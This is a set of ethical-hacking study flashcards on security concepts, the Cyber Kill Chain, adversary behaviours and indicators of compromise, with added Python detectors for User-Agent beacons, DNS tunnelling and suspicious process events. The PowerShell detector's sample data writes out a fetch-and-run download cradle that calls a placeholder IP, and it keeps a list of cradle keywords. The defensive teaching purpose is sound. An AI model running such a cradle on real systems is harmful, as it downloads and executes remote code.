MODULE 1: Intro to Ethical Hacking Flashcards
What is the assurance that information is accessible only to those authorized to have access?
Confidentiality
What is the trustworthiness of data or resources in terms of preventing improper and unauthorized changes?
Integrity
What is assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users?
Availability
What refers to the characteristic of a communication, document, or any data that ensures the quality of being genuine?
Authenticity
What is the guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message?
Non-Repudiation
What term refers to the use of information and communication technologies (ICT) to gain a competitive advantage over an opponent?
Information Warfare or InfoWar
What type of information warfare refers to all strategies and actions to defend against attacks on information and communication technologies assets?
Defensive Information Warfare
What type of information warfare involves attacks against information and communication technologies assets of an opponent?
Offensive Information Warfare
What classification of attack does not tamper with data and involves intercepting and monitoring network traffic and data flow on the target network? (Ex: sniffing, eavesdropping)
Passive Attacks
What classification of attack tampers with data in transit or disrupts communication or services between systems in order to bypass or break into secured systems? (Ex: DoS, MiTM, session hijacking, and SQL Injection)
Active Attacks
What classification of attack is performed when the attacker is in close physical proximity with the target system or network in order to gather, modify, or disrupt access to information? (Ex: social engineering such as eavesdropping, shoulder surfing, and dumpster diving)
Close-In Attacks
What classification of attack involves using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems? (Ex: theft of physical devices, planting keyloggers, backdoors, and malware)
Insider Attacks
What classification of attack occurs when attackers tamper with hardware or software prior to installation, such as at its source or while in transit between source and destination?
Distribution Attack
What methodology is a component of intelligence driven defense for the identification and prevention of malicious intrusion activities by understanding the adversary’s tactics, techniques, and procedures beforehand?
The Cyber Kill Chain Methodology
Which step of the Cyber Kill Chain Methodology involves gathering data on the target to probe for weak points?
Reconnaissance
Which step of the Cyber Kill Chain Methodology involves creating a deliverable malicious payload using an exploit and a backdoor?
Weaponization
Which step of the Cyber Kill Chain Methodology involves sending a weaponized bundle to the victim using email, USB, etc.?
Delivery
Which step of the Cyber Kill Chain Methodology involves exploiting a vulnerability by executing code on the victim’s system?
Exploitation
Which step of the Cyber Kill Chain Methodology involves installing malware on the target system?
Installation
Which step of the Cyber Kill Chain Methodology involves creating a command and control channel to communicate and pass data back and forth?
Command and Control
Which step of the Cyber Kill Chain Methodology involves performing actions to achieve intended objectives/goals?
Actions on Objectives
What are the guidelines that describe the way an attacker performs the attack from beginning to end?
This includes initial exploitation, privilege escalation, and lateral movement.
Tactics
What term classifies the technical methods an attacker uses to achieve intermediate results during the attack?
This includes initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, covering the tracks of data exfiltration, etc.
Techniques
What is the term that describes the organizational approaches that threat actors follow to launch an attack?
Procedures
What term describes the identification of the common methods or techniques followed by an adversary to launch attacks or penetrate an organization’s network?
Adversary Behavioral Identification
Which Adversary Behavior points to an adversary already being inside of a target network?
Indicators include the enumeration of systems, hosts, and processes and the execution of various commands to extract information such as local user context, system config, hostname, IP, active remote systems, and processes running.
Internal Reconnaissance
Which Adversary Behavior can be identified by checking Windows event logs or PowerShell transcript logs?
Used by an adversary for automating data exfiltration and launching further attacks.
Use of PowerShell
Which Adversary Behavior includes the creation and configuration of multiple domains pointing to the same host allowing an adversary to switch quickly between domains to avoid detection?
Unspecified Proxy Activities
Which Adversary Behavior includes interacting with the target system, browsing files, reading file contents, modifying file content, creating new accounts, connecting to the remote system, and downloading and installing malicious code?
Use of Command Line Interface
Which Adversary Behavior includes modifying the contents of the HTTP user-agent field in order to communicate with the compromised system and execute attacks?
HTTP User Agent
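An added example, not part of the original flashcards, of what spotting this behavior looks like in practice: a small scorer over constructed web-proxy log lines that flags User-Agent strings carrying a base64-encoded beacon, a client rotating through several User-Agents to one destination, and a User-Agent seen from only one client. The log lines, hosts, IP addresses, and beacon messages are all made up for the example.

```python
import base64
import re
from collections import defaultdict

CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")
# Hypothetical beacon messages an implant might smuggle inside the User-Agent field.
BEACONS = [b"host:WS09;status:online", b"cmd:whoami;res:CORP\\alice", b"tasklist:ok;next:sleep-60"]

# Constructed proxy log: client_ip, destination host, quoted User-Agent (made up for this example).
SAMPLE_PROXY_LOG = "\n".join([
    f'10.0.0.5 www.example.com "{CHROME_UA}"',
    f'10.0.0.6 www.example.com "{CHROME_UA}"',
    f'10.0.0.7 cdn.example.net "{CHROME_UA}"',
    '10.0.0.5 update.example.org "Microsoft-Delivery-Optimization/10.0"',
] + [f'10.0.0.9 203.0.113.10 "Mozilla/5.0 (Windows NT 6.1; WOW64) {base64.b64encode(b).decode()}"'
     for b in BEACONS])

LINE_RE = re.compile(r'^(\S+) (\S+) "(.*)"$')
# A run of 20+ base64 characters bounded by non-base64 characters; ordinary UA tokens are shorter.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/=])")


def decode_embedded_payload(ua):
    """Return the first base64 token in the UA that decodes to printable ASCII, else None."""
    for m in B64_RE.finditer(ua):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError: not real base64
            continue
        if raw and all(32 <= b < 127 for b in raw):
            return raw.decode("ascii")
    return None


def analyze_proxy_log(log_text, flag_score=3):
    """Score each (client, destination) pair on three User-Agent signals and
    return only the pairs whose score reaches flag_score."""
    ua_clients = defaultdict(set)    # ua -> clients that sent it
    pair_uas = defaultdict(set)      # (client, dest) -> distinct UAs
    payloads = defaultdict(list)     # (client, dest) -> decoded beacons
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, dest, ua = m.groups()
        ua_clients[ua].add(client)
        pair_uas[(client, dest)].add(ua)
        decoded = decode_embedded_payload(ua)
        if decoded:
            payloads[(client, dest)].append(decoded)
    results = {}
    for pair, uas in pair_uas.items():
        score, reasons = 0, []
        if payloads[pair]:
            score += 3
            reasons.append(f"encoded payload in User-Agent: {payloads[pair]}")
        if len(uas) >= 3:
            score += 2
            reasons.append(f"{len(uas)} distinct User-Agents to one destination")
        if any(len(ua_clients[ua]) == 1 for ua in uas):
            score += 1
            reasons.append("User-Agent seen from only one client")
        if score >= flag_score:
            results[pair] = {"score": score, "reasons": reasons}
    return results


if __name__ == "__main__":
    for pair, info in analyze_proxy_log(SAMPLE_PROXY_LOG).items():
        print(pair, info)
```

The rarity signal is deliberately worth only one point: on its own it fires on every legitimate updater or agent with its own User-Agent (the Delivery Optimization line above scores 1 and is not reported), so it is only useful combined with the encoded-payload or rotation signals.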
Which Adversary Behavior includes using servers to communicate remotely with compromised systems through an encrypted session in order to steal data, delete data, and launch further attacks?
Command and Control (C2) Server
Which Adversary Behavior includes obfuscating malicious traffic in legitimate traffic carried by common protocols used in the network?
Allows an adversary to communicate with the C2 server, bypass security controls, and perform data exfiltration.
DNS Tunneling
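An added example, not from the original flashcards, of how DNS tunneling stands out in resolver logs: each query is scored on subdomain payload length, character entropy, and data-carrying record types (TXT, NULL), and each (client, registered domain) pair is also checked for subdomain churn, which is the signature of a tunnel encoding a new chunk of data into every query. The query records and the domain example-c2.test are constructed for this example; the tunnel labels imitate a hex-encoding tunnel. The two-label split for the registered domain is a simplification.

```python
import hashlib
import math
from collections import Counter, defaultdict

# Constructed resolver-log style records: (client_ip, qname, qtype), made up for this
# example. The 30 tunnel labels imitate hex-encoded data chunks in the leftmost label.
TUNNEL_DOMAIN = "example-c2.test"
TUNNEL_LABELS = [hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:50] for i in range(30)]

SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com", "A"),
    ("10.0.0.5", "mail.example.com", "MX"),
    ("10.0.0.5", "_dmarc.example.com", "TXT"),
    ("10.0.0.6", "cdn.example.net", "A"),
    ("10.0.0.6", "a1b2c3d4e5f6.cloudfront.example.net", "A"),   # legitimate hash-like label
    ("10.0.0.7", "update.example.org", "A"),
] + [("10.0.0.9", f"{label}.tun.{TUNNEL_DOMAIN}", "TXT") for label in TUNNEL_LABELS]

FLAG_SCORE = 3          # per-query score at which a single query counts as suspicious
CHURN_THRESHOLD = 20    # distinct subdomains per (client, domain) before churn is flagged


def shannon_entropy(s):
    """Bits per character; encoded data sits near the top of its alphabet's range."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_name(qname):
    """Return (subdomain, registered_domain) using a two-label heuristic.
    A production detector would consult the public suffix list instead."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def score_query(qname, qtype):
    """Long subdomain payload (+2), high entropy (+2) and a record type that can
    carry arbitrary data back to the client (+1). No single feature is enough:
    a hash-like CDN label scores 2 and is not flagged."""
    sub, _ = split_name(qname)
    payload = sub.replace(".", "")
    score = 0
    if len(payload) >= 30:
        score += 2
    if shannon_entropy(payload) >= 3.0:
        score += 2
    if qtype in ("TXT", "NULL"):
        score += 1
    return score


def analyze_dns(queries, flag_score=FLAG_SCORE, churn_threshold=CHURN_THRESHOLD):
    """Aggregate per (client, registered domain); return only pairs with findings."""
    flagged = Counter()
    subdomains = defaultdict(set)
    for client, qname, qtype in queries:
        sub, domain = split_name(qname)
        key = (client, domain)
        subdomains[key].add(sub)
        if score_query(qname, qtype) >= flag_score:
            flagged[key] += 1
    results = {}
    for key, subs in subdomains.items():
        reasons = []
        if flagged[key]:
            reasons.append(f"{flagged[key]} queries scored >= {flag_score}")
        if len(subs) >= churn_threshold:
            reasons.append(f"{len(subs)} distinct subdomains (churn)")
        if reasons:
            results[key] = {"flagged_queries": flagged[key],
                            "distinct_subdomains": len(subs), "reasons": reasons}
    return results


if __name__ == "__main__":
    for key, info in analyze_dns(SAMPLE_QUERIES).items():
        print(key, info)
```

Churn on its own is a noisy signal: some endpoint-protection and reputation services legitimately send thousands of hash-like lookups under one domain, so in practice the churn rule is paired with an allowlist of such domains or with the per-query score.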
Which Adversary Behavior includes manipulating a web server by creating a shell within a website to gain remote access to the server and perform various tasks such as data exfiltration, file transfers, and file uploads?
Use of Web Shell
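An added example, not part of the original flashcards, that covers three of the host-side behaviors above from one set of process-creation events: Internal Reconnaissance (a burst of distinct enumeration tools from one user), Use of PowerShell (decoding the -EncodedCommand blob and checking it for download cradles and hidden-window flags), and Use of Web Shell (a web server worker process spawning a shell). The events, hostnames, user names and the download URL are constructed for this example; the fields mirror what Sysmon Event ID 1 or Windows event 4688 provide.

```python
import base64
import re
from collections import defaultdict

# Hypothetical download cradle. Encoding it the way PowerShell's -EncodedCommand
# expects (base64 over UTF-16LE) yields a realistic sample without hand-typing base64.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")


def make_event(host, user, parent, image, cmdline):
    return {"host": host, "user": user, "parent": parent, "image": image, "cmdline": cmdline}


# Constructed process-creation events, reduced to the fields used here (made up).
SAMPLE_EVENTS = [
    make_event("WS01", "CORP\\alice", r"C:\Windows\explorer.exe",
               r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    make_event("WS01", "CORP\\alice", r"C:\Windows\System32\cmd.exe",
               r"C:\Windows\System32\whoami.exe", "whoami /all"),
    make_event("WS01", "CORP\\alice", r"C:\Windows\System32\cmd.exe",
               r"C:\Windows\System32\net.exe", "net view /domain"),
    make_event("WS01", "CORP\\alice", r"C:\Windows\System32\cmd.exe",
               r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    make_event("WS01", "CORP\\alice", r"C:\Windows\System32\cmd.exe",
               r"C:\Windows\System32\tasklist.exe", "tasklist /v"),
    make_event("WS01", "CORP\\alice", r"C:\Windows\System32\cmd.exe",
               r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}"),
    make_event("WEB01", "IIS APPPOOL\\DefaultAppPool",
               r"C:\Windows\System32\inetsrv\w3wp.exe",
               r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "dir C:\\inetpub\\wwwroot"'),
    make_event("WS02", "CORP\\bob", r"C:\Windows\explorer.exe",
               r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    make_event("WS02", "CORP\\bob", r"C:\Windows\explorer.exe",
               r"C:\Windows\System32\ipconfig.exe", "ipconfig"),
]

# Built-in tools that enumerate users, hosts, network configuration and processes.
RECON_TOOLS = {"whoami", "net", "net1", "ipconfig", "tasklist", "systeminfo", "hostname",
               "nltest", "quser", "qwinsta", "arp", "netstat", "nbtstat", "route"}
WEB_SERVER_PROCS = {"w3wp", "httpd", "apache2", "nginx", "php-cgi", "php-fpm", "tomcat"}
SHELLS = {"cmd", "powershell", "pwsh", "sh", "bash"}
SUSPICIOUS_PS = ("downloadstring", "downloadfile", "invoke-expression", "iex ", "iex(",
                 "invoke-webrequest", "frombase64string", "-w hidden", "bypass")
# Matches -e, -ec, -en, -enc and -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:n(?:c(?:odedcommand)?)?|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def base_name(path):
    """Lower-cased executable name without directory or .exe suffix."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events, recon_threshold=3):
    """Return a list of {host, behavior, evidence} findings for the three behaviors."""
    findings = []
    recon = defaultdict(set)  # (host, user) -> distinct recon tools observed
    for e in events:
        img, parent, cmd = base_name(e["image"]), base_name(e["parent"]), e["cmdline"]
        if img in RECON_TOOLS:
            recon[(e["host"], e["user"])].add(img)
        if img in ("powershell", "pwsh"):
            decoded = decode_encoded_command(cmd)
            haystack = (cmd + " " + (decoded or "")).lower()
            hits = [t for t in SUSPICIOUS_PS if t in haystack]
            if decoded is not None or hits:
                findings.append({"host": e["host"], "behavior": "Use of PowerShell",
                                 "evidence": decoded if decoded is not None else cmd,
                                 "hits": hits})
        if parent in WEB_SERVER_PROCS and img in SHELLS:
            findings.append({"host": e["host"], "behavior": "Use of Web Shell",
                             "evidence": f"{parent} spawned {img}: {cmd}"})
    for (host, user), tools in recon.items():
        if len(tools) >= recon_threshold:
            findings.append({"host": host, "behavior": "Internal Reconnaissance",
                             "evidence": f"{user} ran {sorted(tools)}"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

The reconnaissance rule counts distinct tools per user rather than single commands, because one ipconfig from a help-desk session is normal while whoami, net, ipconfig and tasklist in one session is not; the web shell rule keys on the parent process, since a shell under w3wp.exe or httpd has no legitimate interactive origin.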
Which Adversary Behavior is described as collecting or destroying sensitive data?
Data Staging
What is the term for clues, artifacts, and pieces of forensic data found on the network or OS of an organization that indicates potential intrusion or malicious activity?
Indicators of Compromise
Which indicator of compromise category includes malicious data sent to a target organization or individual?
Email Indicator
Which indicator of compromise category indicates use of a command and control (C2) server, malware delivery, adversary identification of target operating systems, etc.?
Network Indicator